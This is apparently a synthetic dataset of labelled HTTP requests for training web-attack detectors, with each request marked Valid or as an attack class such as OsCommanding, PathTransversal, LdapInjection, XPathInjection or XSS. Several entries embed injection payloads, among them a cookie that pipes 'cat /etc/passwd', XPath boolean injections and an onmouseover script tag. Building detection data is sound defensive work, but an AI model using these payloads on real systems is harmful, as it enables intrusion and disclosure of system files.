GET /c3m@Q6EjbUVR/tCemew1nvt3er/trcreoree/iTrOSLK0mMTK4Ayg62q/nxo5dh0BNkF37qi0Sto/nnSegiixftR.shtml?neEyAaosgvd=9308684&OVZhQwtlike=u%26wgetwf&ftedoteawteh=5502054&st0seio8t8ieb3o=mverifmghy&eabt=i+neexec&mlr=2lq&yovIwhqH=%5Bo+h-i&Wfot=E4ir&@QBNu_tJCXl=LrmEaGfwshwires&nfdps0tx=esirZrrenar HTTP/1.0
Host: www.oriRhien6.fr
Connection: cntqme
Accept: text/xml, video/mpeg
Accept-Charset: windows-1257;q=0.0, macintosh, iso-8859-6, iso-8859-2;q=0.4, windows-1253
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 124.21.115.181
Cookie: pAdutoaJ=is8m6--;lpniIeernt=idenync;yneasdR=4;3shstz9ahne=iBqu0Hw;aciotm21ri4adt=meh;FcatdivtV@0vg0X=tlElstge
Cookie2: $Version="557"
Date: Tue, 22 Mar 05 04:34:13 GMT
ETag: W/"Ghx9w1vzuBKoUCK.u"
Expect: frtsArh=sifr;5snkai=oHretva1
From: oniNcb@l92ecsed.it
If-Modified-Since: Thu, 30 Oct 08 08:01:03 UTC
If-Unmodified-Since: Mon, 12 Apr 10 10:50:31 GMT
If-Match: "YtXJbXxlBvFW7DzIj"
If-None-Match: *
If-Range: Sat, 31 Mar 07 15:04:19 CET
Max-Forwards: 285
MIME-Version: 7.3
Pragma: t=aaiiogib
Proxy-Authorization: Basic c2dlaGpvOm9jbXh0d2Vy
Authorization: rd4r thc9=il9e
Range: 98793-,-49003,-71607
Referer: http://rhnanate.biz/iIydr/9xsadwx/1rroo.swf
TE: chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/9.2 (X11; U; Linux i386 0.0; n0-mn; rv:2.0.2) Gecko/73677041
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3153x522
Via: 4.8 171.231.199.206, 3.2 www.s3qeaihh.png
Transfer-Encoding: identity
Upgrade: uadh/3.9, esa/6.4
Warning: 141 102.221.143.25:60740 "vgrreunklthugbStknar" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 92243859196
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2241
Start - Id: 42983
class: OsCommanding
GET /.GI4nchzz@EZM/15/elFtY0yVSsU_/uBMDBAwiMcxQrjSl/encdtjeLs5tsU9dmesR/uBIDs/6Q6n.2JKh6Rqb_mA/3SAMJYIa0ey/F_UqP0x.boot.iniKnuO/7S9DCzNg%uzKcoJj/hFuJsYsnPhvJQhUxsD-P.pl?mduitxhh=skrEoyei&mscere=8182&dZaCNMunionYa=tQxcB627BpTB&knvop9=s08r%2B%25r+ictasrE&oxei6rfa=92330&eVYue0B=hiwlKx1hecri+br&eun=niwRcneecosti9pes&9ugutfatnr7a=1357&slSltws2sbree=m2inputdepifnqh%2F+&6sf4ethahHe=aselectevalsel0seebcopynn%28d&A5ioasczid=replaceev+mcsambhbnull0hNad&BL-nH=2 HTTP/1.1
Host: 44.5.184.149
Connection: keep-alive
Accept: video/quicktime;q=0.3, image/jpeg;q=0.1
Accept-Charset: euc-cn;q=0.3
Accept-Encoding: 
Accept-Language: cfvje66-ancUlg0v, tHrroh-onSleh;q=0.1, en5Luo-qot;q=0.5
Cache-Control: no-store
Cookie: XgrmiZuOR87=uii\yt>en+ilrpe3odels;WconnectNVHjC7v5and7=hhgf;jah1lt=tC2HYIx3ZKd;wbirenzdidtg8p=v>eono8ehtps;Frrue=| cat   /etc/passwd |;NyldemGbiatsOlo=p
Cookie2: $Version="4"
Date: Tue, 23 Aug 05 19:52:11 UTC
ETag: W/"hihhRMqJ3pb0C8609wd3"
Expect: 100-continue
From: 7MeMfe@gyahIt.cz
If-Modified-Since: Sat, 06 May 06 08:48:41 GMT
If-Match: "TH_mY5Z6WsJOMH-fjtts"
If-None-Match: "@RgWXfB0u@O5V_EyOtx"
If-Range: Sun, 10 Sep 06 18:36:31 GMT
Max-Forwards: 4
Pragma: no-cache
Proxy-Authorization: NTLM aXRhc3FuOHdzbm9leHZzb25lQUxzdGFhcUR1c3preW9vTklhTHJzc29oaQ==
Authorization: Digest algorithm=MD5
Referer: /eTTr/harRws/zeyC58r/7lotnm.png
User-Agent: qendE7yeh07oh
Via: 5.0 www.1Gta2c.gif, 7.4 114.186.42.0
Transfer-Encoding: r3ues; tnesi9id=f19hw
Warning: 304 www.rahw3it.shtml "hmudaRiec" 
----: -------------

null

End - Id: 42983
Start - Id: 28932
class: Valid
GET /eynneGm/o4LaaQJ-kw7CeYrrlEax/3nsatmstAjeE.php4?lX3qe=05968&8tmo=vl&aiis8feFtahoet=773 HTTP/1.1
Host: 127.221.135.219
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=518
Client-ip: 177.45.35.215
Cookie: CiG@=IsuosnadIbimueh;srts1us=uhms;xsne74uvtvoe=975552;stsrNi3=0dOaPoLu7K1c;flirey=9
Cookie2: $Version="5"
Date: Fri, 02 Sep 05 10:25:13 UTC
ETag: "nKSZYl2@q@b@wABR8d"
Expect: gnri
From: seleen@ed934Eesre.st
If-Modified-Since: Sat, 21 Jun 08 05:43:56 CET
If-Unmodified-Since: Tue, 30 Jun 09 21:44:12 UTC
If-Match: "cTsVfcGZtJC0ziE5uQ"
If-None-Match: *
If-Range: Sun, 29 Feb 04 20:27:00 UTC
Max-Forwards: 4604
MIME-Version: 6.1
Pragma: a379vS='ttcTs5'
Proxy-Authorization: NTLM cXV1dGNnRGR3dGFqZHN0ZW9oaDJpbGVhc2lhaWlodWFsbGVwbWpv
Authorization: Digest nonce
Range: 47-52,104931-
Referer: /gadp/rjsen.mspx
TE: chunked,deflate;q=0.4
Trailer: Warning
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 2.1; ye-Ho; rv:4.7.2) Gecko/65966692
UA-CPU: Sparc
UA-Disp: 7993,791,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3649x0845
Via: FTP/9.0 123.62.14.98:086, FTP/7.6 www.jAiovs.shtml, 2.4 www.lRssa.htm
Transfer-Encoding: compress
Upgrade: dgau5D/0.8, iLtaca/1.9
Warning: 849 www.nnoei.jpeg:1260 "it14qNa9s0atUtej4rn" "Sat, 10 Oct 09 18:20:14 CET"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7931332
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28932
Start - Id: 46459
class: PathTransversal
PUT /k21ZeFO4og/Q5QBNgwznetcat.aspx? HTTP/1.0
Content-Length: 24
Content-Language: tsno,eeateah
Content-Encoding: identity
Content-Location: /xUg41c.php3
Content-MD5: dWFpbTBpOG5PdHNxd1Vkaw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 Oct 04 13:31:00 GMT
Host: 147.66.121.135
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.0, gzip;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-stale=16787
Client-ip: 79.17.144.86
Cookie: aedlSo=echoirdib=k;an4iltp=edgsUfromb1m3;efs=e;uTpe711dita=al;nr6aAfeedhnsot=lerTt6t;sEoocosIrolhh=e:/.htaccess~
Date: Sun, 02 Sep 07 13:19:04 GMT
ETag: W/"dn3-xFn2FzlyfrUpfZ"
If-Modified-Since: Sat, 22 Mar 08 03:13:43 GMT
If-Unmodified-Since: Tue, 13 Apr 04 20:03:30 CET
If-Match: "Q4ba-BZu6GzDesD"
If-None-Match: "pF4kW2103EEj3Nzjof"
If-Range: Sat, 16 Jul 05 16:57:28 CET
Max-Forwards: 3
Pragma: no-cache
Authorization: Basic ZXRhbHJtNDpjcnJsYXQ=
Range: 603-,-0,1-
Referer: http://e9tqm.biz/teoi/fr8ix9Ei.fgf
TE: deflate,chunked,chunked;q=0.8
User-Agent: wm3iu/4.2.0.2.3
UA-Color: color32
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vrgiecteEenet=n.Ldeaxxww

End - Id: 46459
Start - Id: 37327
class: LdapInjection
GET /eetteqevx8/yQ0S1P2.5/nMBuEC4LeQ6QWmkr@J/iahoes/ehttrCe4cf0Oohlvva/n5/9@p/sRX/sEietpKe.css? HTTP/1.1
Host: www.htlMa.biz
Connection: srnlgaE
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: )    (| (dseae=hln*)
Cache-Control: max-age=873
Client-ip: 30.6.248.166
Cookie: 0lWcmn=wnn86;B6wZ=eu2t;Gnmrhcmmthc=3123892;vtef=3670075;Llao5n6d=shPzMGVI6W_
Cookie2: $Version="51"
Date: Sun, 17 Aug 08 03:38:23 GMT
ETag: W/"AgBJxgl1AIY7DzU9db"
Expect: ahws
From: ddtp@lesT.org
If-Modified-Since: Mon, 15 Nov 04 22:08:26 UTC
If-Unmodified-Since: Fri, 11 Jul 08 06:48:56 CET
If-Match: "R_t2Fy4Z0mJmZ55fW"
If-None-Match: *
If-Range: Wed, 21 Feb 07 05:23:46 CET
Max-Forwards: 4892
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: dy7k pgiy=6bvq
Authorization: NTLM ZGRvdGVvaGFhMHh2THJFcXJUc3doaW5VZHNpcjBkNjFkdG1laW1uYWll
Range: 1-568088,6956-8,075-
Referer: /gnOc1au/isoekr/sesyoTr/twp2/cnoeOin.msf
TE: gzip,gzip;q=0.9,trailers
Trailer: Range
User-Agent: Esosneu (ajUigfd; kfXYZH; 5w6x122; n.A.Xb0_)
UA-CPU: x86
UA-Disp: 2661,0577,16
UA-OS: FreeBSD
UA-Color: color16
Via: 3.6 www.ael1.html, HTTP/3.3 125.108.79.142, FTP/5.8 7.198.157.18
Transfer-Encoding: identity
Upgrade: OO7l/1.1
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 71.227.252.82
X-Serial-Number: 06549032
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37327
Start - Id: 25278
class: Valid
GET /t6orow.sh?asleshp92=arbgsoundvoae45%3E&bashby=hduyt&j3iynb5e4setits=h%400y%40XCr HTTP/1.0
Host: www.ssaAtnz.net
Connection: ihdnWesx
Accept: text/plain, image/*;q=0.1
Accept-Charset: iso-2022-kr;q=0.0, iso-8859-2;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: max-stale=2
Client-ip: 219.246.136.81
Cookie: c0Eei2ciecWeca=anWFaQzqUv
Cookie2: $Version="10"
Date: Mon, 06 Oct 08 05:17:23 CET
ETag: "XR9yYgKkJC90Wjz"
Expect: 100-continue
From: tgej@l4Mpeyut.cz
If-Modified-Since: Tue, 22 Jul 08 21:48:14 UTC
If-Unmodified-Since: Mon, 20 Apr 09 20:29:20 GMT
If-Match: "ruHU2vR7vpCRHdykjRLv"
If-None-Match: "u5mLJYrg-jGQzbw4s"
If-Range: Thu, 24 Sep 09 14:42:00 CET
Max-Forwards: 7243
MIME-Version: 4.0
Pragma: Oa='C'
Proxy-Authorization: NTLM aTlvbWlCUmphWlRkbmdlcWxqMml5dWl0aWF0ZTI2YWhmTGZjc2FzbnRlbGEzTg==
Authorization: Digest response="fe58E2ff7C5fB02822635c5481Dcfa37"
Range: 04-39299,179937-1471,76-
Referer: http://jieet.org/3EEu/oshtnaan/than/nprtAtk/notmh.gif
TE: deflate
Trailer: Trailer
User-Agent: Eecmroroc (aPeim4DGcz; gx2xby.Z9)
UA-CPU: Sparc
UA-Disp: 8204,1865,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4028x8502
Via: 1.2 www.p5esshkd.jpeg
Transfer-Encoding: identity
Upgrade: smn6/9.9, tqura/5.8, omdo/1.2, eil2/4.6
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25278
Start - Id: 23581
class: Valid
GET /e@Negb1ChK/dAynfIHRAUiT.Yd03W/dRN/7B-Pu.tmpQV1/tt/thsaohydetepx.nsf?boeaail3ilhns=+sae&y@DzP=epjAAi HTTP/1.1
Host: 49.214.219.220
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 214.95.37.188
Cookie: lYrhpDNxnaatra=et 
Cookie2: $Version="95"
Date: Fri, 17 Oct 08 11:23:13 CET
ETag: "WlphIMoksGEL5gbZ"
Expect: rtthtl
From: Aial5osa@Mysrie.uk
If-Modified-Since: Sun, 16 Aug 09 17:08:24 GMT
If-Unmodified-Since: Sat, 27 Sep 08 13:58:06 GMT
If-Match: "ddsfc9P2aKpMoOa9"
If-None-Match: "blvlyfEDgok231Efm2v"
If-Range: Sat, 28 Nov 09 16:46:35 CET
Max-Forwards: 972
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic ZTNpdHNFbnM6UmhobGNQMA==
Authorization: Basic eWk4MGNlOnRnb3c=
Range: 62145-4,-94,41-
Referer: /fwttAkhr.conf
TE: gzip;q=0.4,chunked;q=0.5
Trailer: User-Agent
User-Agent: 7i9nt/5.7.1
UA-CPU: PowerPC
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9524x6181
Via: HTTP/0.9 www.7dNy.jpeg:4507, 3.6 www.degd1.js, 7.3 74.30.72.169:3
Transfer-Encoding: gzip
Upgrade: rtK/6.9
Warning: 307 68.251.106.212:88752 "wNsiieitoeoatbh" "Thu, 13 Jan 05 04:13:27 GMT"
X-Forwarded-For: 141.227.170.60
X-Serial-Number: 1009110184973666911
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23581
Start - Id: 9513
class: Valid
GET /object5oVj0_/zO.tiff?yhienios=%40&rwsgim=hC1uvzm2%40B7&mnitonsq21c=nfrI&lLon=cIE-C4nhzPL&eq=rcgxGi6PAP&on9=5&dbAot=773188&.VNkZG=15485477&8buMbillsr=icownOiZcidkltui&ksro=mm%5Carl1childeu0taopeni&twiJrrrhi=alink+355e HTTP/1.0
Host: 2.44.131.243
Connection: keep-alive
Accept: audio/x-wav, text/plain
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.8, identity, gzip
Accept-Language: *
Cache-Control: Eo6ri=i
Client-ip: 193.54.140.120
Cookie: Enmdiayl0e=ede@
Cookie2: $Version="2"
Date: Sun, 18 Jul 04 04:31:38 UTC
ETag: "l3@N7vATzXIQJKXpkJ6X"
Expect: 100-continue
From: edeOomt@ioOp.com
If-Modified-Since: Sat, 12 Nov 05 09:51:06 GMT
If-Unmodified-Since: Thu, 09 Dec 04 17:42:37 GMT
If-Match: "oYcBcVIRWK3YK__"
If-None-Match: "5-Jbt47t@jKaH@I"
If-Range: *
Max-Forwards: 463
MIME-Version: 1.0
Pragma: dEybhc=Ndjgi3
Proxy-Authorization: UraeR rlDgih=Tobabi
Authorization: Basic ZmZzbjpvdHJyYXlyZQ==
Range: 870431-,61-,-3837
Referer: http://Ojfpe.org/mrBrT/qYaf/e3leid2/lIio0w/dEeo.conf
TE: trailers,gzip
Trailer: Connection
User-Agent: eeopAtv
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 279x7075
Via: 1.7 197.147.174.96, HTTP/4.0 88.1.29.168
Transfer-Encoding: compress
Upgrade: otezgo/5.3, je5ts/2.9, egwO/2.1
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 6034854
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9513
Start - Id: 48761
class: XPathInjection
GET /im6Awnzotbtlsets/pnngw27nc/etnphanoyeemsernt/xjj/hjsrd/ooIU2uAoW/eQS24lBE2yI/9o9m81rfeaAbyealslt/l5vX@3@-HfO0BzS/tB2x4fzTx33KACpSUD7/la9LtGs5kql2R9oZErl/lr.dll?Tee1tsnowet=bErNo%27+++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+++++%27hntI%27++++%3D+%27 HTTP/1.0
Host: 103.164.124.164:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: cp-950;q=0.2, iso-8859-3, hz-gb-2312;q=0.1, shift_jis;q=0.1, iso-8859-9;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 197.156.206.69
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Tue, 16 Oct 07 09:15:48 UTC
ETag: W/"I@hAWbaTz@D0WI_DL5"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Tue, 23 Jun 09 20:08:32 GMT
If-Unmodified-Since: Fri, 02 Jul 04 17:23:40 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: eaar=e
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: NTLM NnQzZW5zZXJTcmVibWFldGxlb2VPaUFsb25kaDFyYjR1eQ==
Range: 11-
Referer: /toa8o/6i5En/ovnsrc/mqtsoeny/dhcauItE.ace
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 2.2; hs-eo; rv:6.2.6) Gecko/98904305
UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: FTP/0.6 www.unmmaoo.html, Cal/1.3 www.y4ec8.jpg
Transfer-Encoding: deflate
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 479 211.56.14.116 "qeorie44toHnoseg46" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48761
Start - Id: 23547
class: Valid
GET /tl64trsnthcyraeinto/abAYH.MZn/o.NIAiGc/u9NlhB0dJBXX2u/m4SVa6Op.cgi?jhoaab1Ea=oo0wlatooose&Oohna=6&iTesi0tgmn=aVY&K2ZwiB=e8cEbjFJ82U&sXp1xterm=txa&2W=hPjlL.8el&DLIUVX=3575&Keo3ad=Einclude-tsmsehme%5D%28y+d3+open&Rioi66H=tmdoeentq4f7si&u4osyvadyg=uzoSHpCP9&dniIoit=tsqlroetcn4za5DLt&illt0dreleyr4=sSi++dee-eeetcH HTTP/1.0
Host: www.icroegsw.fr
Connection: keep-alive
Accept: video/quicktime;q=0.2, video/*
Accept-Charset: euc-tw, utf-7;q=0.4
Accept-Encoding: identity, deflate;q=0.9, gzip;q=0.1, gzip, deflate;q=0.7
Accept-Language: ptelmuha-ltNsei;q=0.0, sleieihd-cRvbea;q=0.3, wassdo-mlogas, mlcLect-7koewl;q=0.8, rxtrwt1-shmIerme;q=0.3
Cache-Control: max-stale=4
Client-ip: 186.208.141.68
Cookie: ehllpOlnliurue=havingls:enPjfch;yce=a;eosAapali=ih7Qh_C
Cookie2: $Version="925"
Date: Sun, 31 Aug 08 02:10:26 GMT
ETag: "ATZ1OC@4L_0pKrDwRh"
Expect: 100-continue
From: Iqdva@bayiga.ch
If-Modified-Since: Mon, 14 Jun 04 04:50:41 GMT
If-Unmodified-Since: Wed, 23 May 07 11:29:45 UTC
If-Match: "yUeeyqQZT4iBi1tvcDW"
If-None-Match: *
If-Range: "_6tyVzsKKAS.O-c"
Max-Forwards: 170
MIME-Version: 2.1
Pragma: heqypo=ipbo
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Basic bnVoc2JvOmVBcnlpaUNi
Range: 9-582047,9-,23678-00
Referer: /mTIyf/mdOo.pdf
TE: gzip
Trailer: Referer
User-Agent: Mozilla/9.0 (compatible; nsieitxn; Win98; lllinajnt; arsu; tmzply)
UA-CPU: StrongARM
UA-Disp: 295,456,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4426x0282
Via: HTTP/6.1 www.mrsotrs.tiff
Transfer-Encoding: compress
Upgrade: Els/5.8
Warning: 266 191.138.56.230:98 "diio" "Tue, 17 Apr 07 03:38:46 CET"
X-Forwarded-For: 224.154.235.176
X-Serial-Number: 4147568575468348
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23547
Start - Id: 32700
class: Valid
POST /ry/4K8rwgetx.jpeg? HTTP/1.0
Content-Length: 13
Content-Language: ye3ac,In
Content-Encoding: deflate
Content-Location: /an7zo/esH6daeH/hoeeunEs/js5avel/ed3Ossid.png
Content-MD5: Vm1hZXV5bDhpcHBvaEwxeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Nov 08 23:23:52 GMT
Last-Modified: Mon, 10 Aug 09 24:17:03 GMT
Host: 56.207.36.157
Connection: o0te
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: Hcun3ntg-mIEidt3t
Cache-Control: no-transform
Client-ip: 8.228.19.152
Cookie: lrbiefbgfcsZnn3=tQqrwZkoo;hopenzKreplace=tUb;Dtoceid1=tvkXRU9@FY
Cookie2: $Version="25"
Date: Thu, 27 Dec 07 08:54:53 CET
ETag: W/"Z-E63Eov10fSRQJm"
Expect: 100-continue
From: tnTmch@jgcsnn9n.de
If-Modified-Since: Fri, 09 Dec 05 05:05:21 UTC
If-Unmodified-Since: Tue, 07 Jun 05 17:44:17 UTC
If-Match: *
If-None-Match: *
If-Range: "ahErFR7IX2d398RGV"
Max-Forwards: 414
MIME-Version: 9.9
Pragma: igtprOds=o
Proxy-Authorization: nestv tja1hRn=cehh
Authorization: 5sw8 xroouN=Txye
Range: 08-42,29612-1
Referer: /pbincow/mpFt.jpeg
TE: deflate;q=0.2
Trailer: Authorization
User-Agent: nYa-QdSKa http://www.eeyecx.net
UA-CPU: MIPS
UA-Disp: 6104,859,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1210x8264
Via: HTTP/5.2 www.3eqEpe.jpg:5480, 3.7 www.dT01.css, 1.9 204.247.143.87
Transfer-Encoding: identity
Upgrade: 9rnbnr/4.3
Warning: 094 177.241.223.179 "7haograq7asdssi" "Fri, 22 Dec 06 16:25:30 CET"
X-Forwarded-For: 67.157.122.212
X-Serial-Number: 590618
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oziwtof=OEsed

End - Id: 32700
Start - Id: 49014
class: XPathInjection
GET /1g9SU3YD/qthpei6ennssan/fLheshIAAtlm/aby_MYrgRNi7cIGol/m0J2c/5cnsen5St/ny52uSOuR8dYn/sP_qi5L0.dll?3xn5na=kyupht&ybape1Ath4=a7onfd&eeBddkrsBorta=2&tn=rn2%27+or+++++%28i++++%3C+count%28hdydd%2Fchild%3A%3Atext%28%29%29+++and+j++++%3C+count%28wPsgd%2Fchild%3A%3Acomment%28%29%29++++and+k+++++%3C++count%28eiWho%2Fchild%3A%3A*%29+%29++or+++%27hthd7fy%27+++%3D++%27++5gia%27+++or&RnetacLi=ia-VlCRNZqy&hxTt=tIKAP&e7=nelsrtelnetf HTTP/1.0
Host: 74.205.130.46:80
Connection: 4stmDn
Accept: */*;q=0.5
Accept-Charset: iso-8859-9;q=0.9, windows-1257;q=0.2, euc-tw;q=0.5, windows-1251, iso-10646-ucs-2
Accept-Encoding: compress;q=0.8, deflate;q=0.2, gzip;q=0.8, deflate
Accept-Language: *
Cache-Control: max-age=93157
Client-ip: 89.182.168.169
Cookie: @VFautoexeclBOQnph-R=00
Cookie2: $Version="4"
Date: Mon, 22 Mar 04 22:33:06 UTC
ETag: "fenyfz9ehkcpexX1K"
Expect: EtKttam=ESeh
From: mn1eatis@ye8qeam0O8.be
If-Modified-Since: Sun, 10 Aug 08 01:40:53 GMT
If-Unmodified-Since: Sat, 10 Dec 05 07:41:03 GMT
If-Match: "DpUV2ZqyRvmEGmRtq5i"
If-None-Match: *
If-Range: Tue, 12 Jun 07 12:08:15 GMT
Max-Forwards: 4
MIME-Version: 9.3
Pragma: eT=eieet
Proxy-Authorization: NTLM aXNlcm54Q3Nsa2FvbmVOaWlvQWV0bG9uMXhqbHdvZTg=
Authorization: Basic YkVybmVyUjphZDlwZQ==
Range: -31
Referer: /xmltmir/to1gs/SIauT/ci5s.mpeg
TE: deflate;q=0.1
Trailer: From
User-Agent: eooh1istv7siNi
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3985x064
Via: ss1R/2.7 www.tn52oseg.gif, FTP/6.4 51.153.64.48, HTTP/9.5 56.130.255.40
Transfer-Encoding: ams4oY; 9Rqemar=5rAt7y5F
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 584 www.to8Zs.jpeg "prpRute" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49014
Start - Id: 33112
class: Valid
POST /aJSRDtfkF/zYHpg5SLG2/hoNNivhecl3/tg/augetmds7s6ea/DA4tmpquPk/e.Ym88/rb/7ViG.qh.jpeg? HTTP/1.0
Content-Length: 93
Content-Language: choab
Content-Encoding: identity
Content-Location: http://www.nnpq.it/Tsdgtid/selhs/HfDselih.fgf
Content-MD5: dEs4bW5zbm9uZXcxb2g3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Jan 06 06:13:50 CET
Last-Modified: Wed, 23 Sep 09 08:02:12 GMT
Host: 242.70.16.142:09
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.3, identity, gzip, deflate, compress
Accept-Language: nl-halhoe, OdT-eag, trv-sAsNwvv;q=0.7, gLe-ooii
Cache-Control: only-if-cached
Client-ip: 230.124.221.154
Cookie: _INeNzq.-Ga=36;7sAesnrasjet=e3nij;XcsamqbgsoundrmrcpdocumentQy0X=prnc1oaz
Cookie2: $Version="632"
Date: Fri, 05 Nov 04 07:14:41 UTC
ETag: W/"bDzoR09LB_5br0EO"
Expect: lopnwT0=ei8deh
From: ryupoa@thaex.ch
If-Modified-Since: Fri, 22 May 09 03:26:37 CET
If-Unmodified-Since: Sun, 29 Jan 06 23:34:43 UTC
If-Match: "skf551gwvuuWyHjZLoo"
If-None-Match: *
If-Range: Wed, 15 Sep 04 11:59:07 CET
Max-Forwards: 348
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZWxudHRsOmk0ZTFl
Authorization: Digest nc=c1e03B3a
Range: -794940,20-24662
Referer: /lnRalT/eiL4l9z.jsp
TE: trailers,trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 5.2; os-si; rv:2.1.6) Gecko/98870216
UA-CPU: Sparc
UA-Disp: 8524,604,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6581x441
Via: 1.3 www.gLmtci.shtml:46438, 2.0 www.og30kst.jpg:61, FTP/7.8 254.215.161.17
Transfer-Encoding: deflate
Upgrade: dto/7.0
Warning: 956 www.r68u.htm:49944 "evd84o8ca9e" "Thu, 15 Dec 05 04:21:49 CET"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 1678510010970720338
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

VehopEs=IslikeshutdownU3tmpL1h&t2niz9Gmhlayore=3&wFcgCeja=rTamNm46aSM&wRfPY2D=]oysitEisn9Qi

End - Id: 33112
Start - Id: 47324
class: XSS
GET /ehJK@QI39-G.MQFwrDb/y@V3Q_ni/atkhosi4w/rL_MK3/p.dWt1Z/op1F/eusd/08Fcopyt1M-Fz@Pexz/gajVI/zmtbl/-R.js?dI24=t&blltjnTrnnm=468990&ljD5@=6165199&aee7rjen4=tp3uc5Uz9&n3seye7hagio=sselecta+pheii%24&ofT2a=9625&he5Cet4hr=rLS.A&tNwbmvscaj4i=%3Cimg++src%3D+++%22+orstinme++++%3E+++++%22+++onmouseover+%3D%22%5Balert%28%27ie%27%29%3B%5D+%22+%3E HTTP/1.1
Host: www.ztoese.st
Connection: keep-alive
Accept: video/quicktime;q=0.5, text/plain
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.7, compress, compress;q=0.8, compress;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 68.164.101.129
Cookie: aai=558755;sdtieerm0tzhofe=tryhomes;eeohthckoWase=? h5;tygk8=neosaOiGnenehqn;irS=4;0wthoaeiln=pauvsddo
Cookie2: $Version="7"
Date: Fri, 25 Jan 08 24:25:33 CET
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
